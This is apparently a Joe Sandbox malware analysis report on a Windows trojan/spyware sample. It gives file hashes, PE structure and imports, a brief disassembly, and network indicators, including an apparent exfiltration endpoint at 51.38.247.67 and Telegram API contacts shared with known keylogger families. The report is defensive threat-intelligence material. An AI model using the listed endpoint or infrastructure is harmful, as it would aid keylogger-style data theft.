| http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | RegSvcs.exe, 00000002.00000002.4603067666.00000000030C1000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | RegSvcs.exe, 00000002.00000002.4604479109.00000000043D0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4604479109.00000000040E1000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded | 19d6P55zd1.exe, 00000000.00000002.2166172268.0000000001E90000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4601945370.0000000000402000.00000040.80000000.00040000.00000000.sdmp | false | | high |
| https://reallyfreegeoip.org/xml/ | 19d6P55zd1.exe, 00000000.00000002.2166172268.0000000001E90000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4601945370.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4603067666.0000000003110000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| IP | Domain | Country | ASN | ASN Name | Malicious |
| 149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false |
| 104.21.112.1 | reallyfreegeoip.org | United States | 13335 | CLOUDFLARENETUS | false |
| 132.226.247.73 | checkip.dyndns.com | United States | 16989 | UTMEMUS | false |
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1588019
Start date and time: 2025-01-10 20:36:46 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 42s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 7
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: 19d6P55zd1.exe (renamed because the original name is a hash value)
Original Sample Name: 9843d3697d4998e63df6e33939a163e4ebe4f3a8f50f292508992b16680950e5.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@3/2@3/3
EGA Information:
• Successful, ratio: 50%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 52
• Number of non-executed functions: 276
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• Excluded IPs from analysis (whitelisted): 13.107.246.45, 4.175.87.197
• Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target RegSvcs.exe, PID 1340 because it is empty
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
| Time | Type | Description |
| 14:37:43 | API Interceptor | 10798527x Sleep call for process: RegSvcs.exe modified |
Match | Associated Sample Name / URL | Detection | Threat Name | Context
149.154.167.220 | 9L83v5j083.exe | malicious | Snake Keylogger, VIP Keylogger | -
149.154.167.220 | y1jQC8Y6bP.exe | malicious | MassLogger RAT | -
149.154.167.220 | FILHKLtCw0.exe | malicious | GuLoader, MassLogger RAT | -
149.154.167.220 | ppISxhDcpF.exe | malicious | GuLoader, MassLogger RAT | -
149.154.167.220 | m0CZ8H4jfl.exe | malicious | GuLoader, MassLogger RAT | -
149.154.167.220 | fGu8xWoMrg.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | -
149.154.167.220 | RubzLi27lr.exe | malicious | Snake Keylogger, VIP Keylogger | -
149.154.167.220 | 6mllsKaB2q.exe | malicious | AsyncRAT, StormKitty, WorldWind Stealer | -
149.154.167.220 | YJwE2gTm02.exe | malicious | Snake Keylogger, VIP Keylogger | -
149.154.167.220 | AHSlIDftf1.exe | malicious | Snake Keylogger, VIP Keylogger | -
104.21.112.1 | QUOTATION#070125-ELITE MARINE .exe | malicious | FormBook | www.buyspeechst.shop/w98i/
104.21.112.1 | wxl1r0lntg.exe | malicious | DCRat, PureLog Stealer, zgRAT | 838596cm.nyafka.top/lineLongpolllinuxFlowercentraluploads.php
104.21.112.1 | SH8ZyOWNi2.exe | malicious | CMSBrute | beammp.com/phpmyadmin/
132.226.247.73 | fGu8xWoMrg.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
132.226.247.73 | eLo1khn7DQ.exe | malicious | MassLogger RAT | checkip.dyndns.org/
132.226.247.73 | v3tK92KcJV.exe | malicious | Snake Keylogger | checkip.dyndns.org/
132.226.247.73 | MtxN2qEWpW.exe | malicious | Snake Keylogger | checkip.dyndns.org/
132.226.247.73 | 8nkdC8daWi.exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
132.226.247.73 | New Order-090125.exe | malicious | MassLogger RAT, PureLog Stealer | checkip.dyndns.org/
132.226.247.73 | B7N48hmO78.exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
132.226.247.73 | #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
132.226.247.73 | fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
132.226.247.73 | 1C24TDP_000000029.jse | malicious | MassLogger RAT | checkip.dyndns.org/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
checkip.dyndns.com | 9L83v5j083.exe | malicious | Snake Keylogger, VIP Keylogger | 193.122.6.168
checkip.dyndns.com | y1jQC8Y6bP.exe | malicious | MassLogger RAT | 193.122.130.0
checkip.dyndns.com | FILHKLtCw0.exe | malicious | GuLoader, MassLogger RAT | 193.122.6.168
checkip.dyndns.com | ppISxhDcpF.exe | malicious | GuLoader, MassLogger RAT | 132.226.8.169
checkip.dyndns.com | CvzLvta2bG.exe | malicious | MassLogger RAT, PureLog Stealer | 132.226.8.169
checkip.dyndns.com | m0CZ8H4jfl.exe | malicious | GuLoader, MassLogger RAT | 193.122.6.168
checkip.dyndns.com | FPACcnxAUT.exe | malicious | MassLogger RAT | 193.122.6.168
checkip.dyndns.com | jxy62Zm6c4.exe | malicious | MassLogger RAT | 158.101.44.242
checkip.dyndns.com | fGu8xWoMrg.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 132.226.247.73
checkip.dyndns.com | RubzLi27lr.exe | malicious | Snake Keylogger, VIP Keylogger | 193.122.6.168
reallyfreegeoip.org | 9L83v5j083.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.32.1
reallyfreegeoip.org | y1jQC8Y6bP.exe | malicious | MassLogger RAT | 104.21.80.1
reallyfreegeoip.org | FILHKLtCw0.exe | malicious | GuLoader, MassLogger RAT | 104.21.64.1
reallyfreegeoip.org | ppISxhDcpF.exe | malicious | GuLoader, MassLogger RAT | 104.21.96.1
reallyfreegeoip.org | CvzLvta2bG.exe | malicious | MassLogger RAT, PureLog Stealer | 104.21.32.1
reallyfreegeoip.org | m0CZ8H4jfl.exe | malicious | GuLoader, MassLogger RAT | 104.21.96.1
reallyfreegeoip.org | FPACcnxAUT.exe | malicious | MassLogger RAT | 104.21.96.1
reallyfreegeoip.org | jxy62Zm6c4.exe | malicious | MassLogger RAT | 104.21.96.1
reallyfreegeoip.org | fGu8xWoMrg.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 104.21.96.1
reallyfreegeoip.org | RubzLi27lr.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.16.1
api.telegram.org | 9L83v5j083.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | y1jQC8Y6bP.exe | malicious | MassLogger RAT | 149.154.167.220
api.telegram.org | FILHKLtCw0.exe | malicious | GuLoader, MassLogger RAT | 149.154.167.220
api.telegram.org | ppISxhDcpF.exe | malicious | GuLoader, MassLogger RAT | 149.154.167.220
api.telegram.org | m0CZ8H4jfl.exe | malicious | GuLoader, MassLogger RAT | 149.154.167.220
api.telegram.org | fGu8xWoMrg.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | RubzLi27lr.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | 6mllsKaB2q.exe | malicious | AsyncRAT, StormKitty, WorldWind Stealer | 149.154.167.220
api.telegram.org | YJwE2gTm02.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | AHSlIDftf1.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
Match | Associated Sample Name / URL | Detection | Threat Name | Context
TELEGRAMRU | 9L83v5j083.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
TELEGRAMRU | y1jQC8Y6bP.exe | malicious | MassLogger RAT | 149.154.167.220
TELEGRAMRU | FILHKLtCw0.exe | malicious | GuLoader, MassLogger RAT | 149.154.167.220
TELEGRAMRU | ppISxhDcpF.exe | malicious | GuLoader, MassLogger RAT | 149.154.167.220
TELEGRAMRU | m0CZ8H4jfl.exe | malicious | GuLoader, MassLogger RAT | 149.154.167.220
TELEGRAMRU | fGu8xWoMrg.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 149.154.167.220
TELEGRAMRU | RubzLi27lr.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
TELEGRAMRU | 6mllsKaB2q.exe | malicious | AsyncRAT, StormKitty, WorldWind Stealer | 149.154.167.220
TELEGRAMRU | YJwE2gTm02.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
TELEGRAMRU | AHSlIDftf1.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
UTMEMUS | ppISxhDcpF.exe | malicious | GuLoader, MassLogger RAT | 132.226.8.169
UTMEMUS | CvzLvta2bG.exe | malicious | MassLogger RAT, PureLog Stealer | 132.226.8.169
UTMEMUS | fGu8xWoMrg.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 132.226.247.73
UTMEMUS | xom6WSISuh.exe | malicious | MassLogger RAT, PureLog Stealer | 132.226.8.169
UTMEMUS | eLo1khn7DQ.exe | malicious | MassLogger RAT | 132.226.247.73
UTMEMUS | 3WgNXsWvMO.exe | malicious | MassLogger RAT | 132.226.8.169
UTMEMUS | v3tK92KcJV.exe | malicious | Snake Keylogger | 132.226.247.73
UTMEMUS | r5yYt97sfB.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 132.226.8.169
UTMEMUS | MtxN2qEWpW.exe | malicious | Snake Keylogger | 132.226.247.73
UTMEMUS | 8nkdC8daWi.exe | malicious | Snake Keylogger, VIP Keylogger | 132.226.247.73
CLOUDFLARENETUS | 9L83v5j083.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.32.1
CLOUDFLARENETUS | y1jQC8Y6bP.exe | malicious | MassLogger RAT | 104.21.80.1
CLOUDFLARENETUS | AuKUol8SPU.exe | malicious | FormBook | 104.21.48.233
CLOUDFLARENETUS | FILHKLtCw0.exe | malicious | GuLoader, MassLogger RAT | 104.21.64.1
CLOUDFLARENETUS | EIvidclKOb.exe | malicious | FormBook | 172.67.137.47
CLOUDFLARENETUS | ht58337iNC.exe | malicious | GuLoader | 172.67.152.246
CLOUDFLARENETUS | wWXR5js3k2.exe | malicious | FormBook | 188.114.97.3
CLOUDFLARENETUS | https://probashkontho.com/work/Organization/privacy/index_.html | malicious | Unknown | 104.17.25.14
CLOUDFLARENETUS | psibx9rXra.exe | malicious | FormBook | 23.227.38.74
CLOUDFLARENETUS | ppISxhDcpF.exe | malicious | GuLoader, MassLogger RAT | 104.21.96.1
Match | Associated Sample Name / URL | Detection | Threat Name | Context
54328bd36c14bd82ddaa0c04b25ed9ad | 9L83v5j083.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.112.1
54328bd36c14bd82ddaa0c04b25ed9ad | y1jQC8Y6bP.exe | malicious | MassLogger RAT | 104.21.112.1
54328bd36c14bd82ddaa0c04b25ed9ad | FILHKLtCw0.exe | malicious | GuLoader, MassLogger RAT | 104.21.112.1
54328bd36c14bd82ddaa0c04b25ed9ad | ppISxhDcpF.exe | malicious | GuLoader, MassLogger RAT | 104.21.112.1
54328bd36c14bd82ddaa0c04b25ed9ad | CvzLvta2bG.exe | malicious | MassLogger RAT, PureLog Stealer | 104.21.112.1
54328bd36c14bd82ddaa0c04b25ed9ad | m0CZ8H4jfl.exe | malicious | GuLoader, MassLogger RAT | 104.21.112.1
54328bd36c14bd82ddaa0c04b25ed9ad | FPACcnxAUT.exe | malicious | MassLogger RAT | 104.21.112.1
54328bd36c14bd82ddaa0c04b25ed9ad | jxy62Zm6c4.exe | malicious | MassLogger RAT | 104.21.112.1
54328bd36c14bd82ddaa0c04b25ed9ad | fGu8xWoMrg.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 104.21.112.1
54328bd36c14bd82ddaa0c04b25ed9ad | RubzLi27lr.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.112.1
3b5074b1b5d032e5620f69f9f700ff0e | 9L83v5j083.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | y1jQC8Y6bP.exe | malicious | MassLogger RAT | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | FILHKLtCw0.exe | malicious | GuLoader, MassLogger RAT | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | ppISxhDcpF.exe | malicious | GuLoader, MassLogger RAT | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | m0CZ8H4jfl.exe | malicious | GuLoader, MassLogger RAT | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | s2Jg1MAahY.exe | malicious | AgentTesla | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | fGu8xWoMrg.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | MqzEQCpFAY.exe | malicious | Unknown | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | RubzLi27lr.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | MqzEQCpFAY.exe | malicious | Unknown | 149.154.167.220

No context
Process: C:\Users\user\Desktop\19d6P55zd1.exe
File Type: data
Category: dropped
Size (bytes): 134046
Entropy (8bit): 7.938394396166148
Encrypted: false
SSDEEP: 3072:MJzSl5c4c7xcZqPiqw5aKXipwkVxEBEZGfzM7OuirtDnH/Yc:N5cLu8a5z7mS7qvwwc
MD5: 5244769C1FCF82429AD354C89DB61B2E
SHA1: 551E77A8FCE240A6FFF60CC7A6EB58B57CA00BE7
SHA-256: 25423180B5458649B23FF3B3E4B509FCD9D21EBFE246E6081FC88AB1C8D1982D
SHA-512: 04B11A629267E52922FADB9D44CFED3E8F2446AFCC2667B80F932647E444CBD792F40720EBD27E149E76935A94CF737909D35A2EA39B05DABB2082105975B68B
Malicious: false
Reputation: low
                                                                                                                  Process:C:\Users\user\Desktop\19d6P55zd1.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):274944
                                                                                                                  Entropy (8bit):6.984890432524203
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6144:rMURVGYIdzpxqPq1dUMFiYYYlUvoniAPw+erznQS7:rMURVWpUPq0YGwnibfQS7
                                                                                                                  MD5:336C7938326638A85120F1D1E3788AB9
                                                                                                                  SHA1:1015B7427E0FEED7C51C1A2D14F8DD25CC092452
                                                                                                                  SHA-256:8AF5D305B73BC5E8BBD23AE0AF4F9C3F06E502FDE3F2DCEF4FD89F56B17E9CB2
                                                                                                                  SHA-512:F185B3F83C8B8784BB3B46058A64F5B0316F466B67D8F259CD4289F8C5CDFCA6BBB66111F0A889D480BA7A291BDF6F2B4D8AB3541D67B0C2D8C6AF55D5FB724A
                                                                                                                  Malicious:false
                                                                                                                  Reputation:low
                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                  Entropy (8bit):6.987914983030458
                                                                                                                  TrID:
                                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                  File name:19d6P55zd1.exe
                                                                                                                  File size:1'048'576 bytes
                                                                                                                  MD5:13e4d4a655db53282e89478eb1fdd462
                                                                                                                  SHA1:1b72c5e4e03807aa857f095db92a76e36fd2b0cd
                                                                                                                  SHA256:9843d3697d4998e63df6e33939a163e4ebe4f3a8f50f292508992b16680950e5
                                                                                                                  SHA512:01e08a87f0f26fdac2854945e55f37fb1215e7b4b2cff85575b590c4a75a6e77e35d941897bdb2f782a418a15410ebd48916a79a4e0774ec3407673d443bd2d1
                                                                                                                  SSDEEP:24576:qu6J33O0c+JY5UZ+XC0kGso6Faj2n7pbWY:cu0c++OCvkGs9FajW7gY
                                                                                                                  TLSH:1525BE2273DDC360CB669173BF69B7016EBF7C614A30B95B2F880D7DA950162162C7A3
                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.
                                                                                                                  Icon Hash:aaf3e3e3938382a0
                                                                                                                  Entrypoint:0x427dcd
                                                                                                                  Entrypoint Section:.text
                                                                                                                  Digitally signed:false
                                                                                                                  Imagebase:0x400000
                                                                                                                  Subsystem:windows gui
                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                  Time Stamp:0x675AC211 [Thu Dec 12 10:59:29 2024 UTC]
                                                                                                                  TLS Callbacks:
                                                                                                                  CLR (.Net) Version:
                                                                                                                  OS Version Major:5
                                                                                                                  OS Version Minor:1
                                                                                                                  File Version Major:5
                                                                                                                  File Version Minor:1
                                                                                                                  Subsystem Version Major:5
                                                                                                                  Subsystem Version Minor:1
                                                                                                                  Import Hash:afcdf79be1557326c854b6e20cb900a7
                                                                                                                  Instruction
                                                                                                                  call 00007FAA78B8770Ah
                                                                                                                  jmp 00007FAA78B7A4D4h
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  push edi
                                                                                                                  push esi
                                                                                                                  mov esi, dword ptr [esp+10h]
                                                                                                                  mov ecx, dword ptr [esp+14h]
                                                                                                                  mov edi, dword ptr [esp+0Ch]
                                                                                                                  mov eax, ecx
                                                                                                                  mov edx, ecx
                                                                                                                  add eax, esi
                                                                                                                  cmp edi, esi
                                                                                                                  jbe 00007FAA78B7A65Ah
                                                                                                                  cmp edi, eax
                                                                                                                  jc 00007FAA78B7A9BEh
                                                                                                                  bt dword ptr [004C31FCh], 01h
                                                                                                                  jnc 00007FAA78B7A659h
                                                                                                                  rep movsb
                                                                                                                  jmp 00007FAA78B7A96Ch
                                                                                                                  cmp ecx, 00000080h
                                                                                                                  jc 00007FAA78B7A824h
                                                                                                                  mov eax, edi
                                                                                                                  xor eax, esi
                                                                                                                  test eax, 0000000Fh
                                                                                                                  jne 00007FAA78B7A660h
                                                                                                                  bt dword ptr [004BE324h], 01h
                                                                                                                  jc 00007FAA78B7AB30h
                                                                                                                  bt dword ptr [004C31FCh], 00000000h
                                                                                                                  jnc 00007FAA78B7A7FDh
                                                                                                                  test edi, 00000003h
                                                                                                                  jne 00007FAA78B7A80Eh
                                                                                                                  test esi, 00000003h
                                                                                                                  jne 00007FAA78B7A7EDh
                                                                                                                  bt edi, 02h
                                                                                                                  jnc 00007FAA78B7A65Fh
                                                                                                                  mov eax, dword ptr [esi]
                                                                                                                  sub ecx, 04h
                                                                                                                  lea esi, dword ptr [esi+04h]
                                                                                                                  mov dword ptr [edi], eax
                                                                                                                  lea edi, dword ptr [edi+04h]
                                                                                                                  bt edi, 03h
                                                                                                                  jnc 00007FAA78B7A663h
                                                                                                                  movq xmm1, qword ptr [esi]
                                                                                                                  sub ecx, 08h
                                                                                                                  lea esi, dword ptr [esi+08h]
                                                                                                                  movq qword ptr [edi], xmm1
                                                                                                                  lea edi, dword ptr [edi+08h]
                                                                                                                  test esi, 00000007h
                                                                                                                  je 00007FAA78B7A6B5h
                                                                                                                  bt esi, 03h
                                                                                                                  jnc 00007FAA78B7A708h
                                                                                                                  Programming Language:
                                                                                                                  • [ASM] VS2013 build 21005
                                                                                                                  • [ C ] VS2013 build 21005
                                                                                                                  • [C++] VS2013 build 21005
                                                                                                                  • [ C ] VS2008 SP1 build 30729
                                                                                                                  • [IMP] VS2008 SP1 build 30729
                                                                                                                  • [ASM] VS2013 UPD4 build 31101
                                                                                                                  • [RES] VS2013 build 21005
                                                                                                                  • [LNK] VS2013 UPD4 build 31101
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xba44c | 0x17c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc7000 | 0x37614 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xff000 | 0x711c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x92bc0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xa4870 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IAT | 0x8f000 | 0x884 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | -
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x8dcc4 | 0x8de00 | d28a820a1d9ff26cda02d12b888ba4b4 | False | 0.5728679102422908 | data | 6.676118058520316 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8f000 | 0x2e10e | 0x2e200 | 79b14b254506b0dbc8cd0ad67fb70ad9 | False | 0.33535526761517614 | OpenPGP Public Key | 5.76010872795207 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xbe000 | 0x8f74 | 0x5200 | 9f9d6f746f1a415a63de45f8b7983d33 | False | 0.1017530487804878 | data | 1.198745897703538 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xc7000 | 0x37614 | 0x37800 | 25ca859e3d631f2e46a6b993b1ddc2ee | False | 0.8800191793355856 | data | 7.7797751085790114 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xff000 | 0x711c | 0x7200 | 6fcae3cbbf6bfbabf5ec5bbe7cf612c3 | False | 0.7650767543859649 | data | 6.779031650454199 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xc75a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xc76d0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xc77f8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xc7920 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
RT_ICON | 0xc7c08 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
RT_ICON | 0xc7d30 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
RT_ICON | 0xc8bd8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
RT_ICON | 0xc9480 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
RT_ICON | 0xc99e8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
RT_ICON | 0xcbf90 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
RT_ICON | 0xcd038 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
RT_MENU | 0xcd4a0 | 0x50 | data | English | Great Britain | 0.9
RT_STRING | 0xcd4f0 | 0x594 | data | English | Great Britain | 0.3333333333333333
RT_STRING | 0xcda84 | 0x68a | data | English | Great Britain | 0.2747909199522103
RT_STRING | 0xce110 | 0x490 | data | English | Great Britain | 0.3715753424657534
RT_STRING | 0xce5a0 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xceb9c | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xcf1f8 | 0x466 | data | English | Great Britain | 0.3605683836589698
RT_STRING | 0xcf660 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
RT_RCDATA | 0xcf7b8 | 0x2e8db | data | - | - | 1.0003461241956546
RT_GROUP_ICON | 0xfe094 | 0x76 | data | English | Great Britain | 0.6610169491525424
RT_GROUP_ICON | 0xfe10c | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0xfe120 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0xfe134 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0xfe148 | 0xdc | data | English | Great Britain | 0.6181818181818182
RT_MANIFEST | 0xfe224 | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
DLL | Import
WSOCK32.dll | WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll | GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll | WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll | InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL | GetProcessMemoryInfo
IPHLPAPI.DLL | IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll | DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll | IsThemeActive
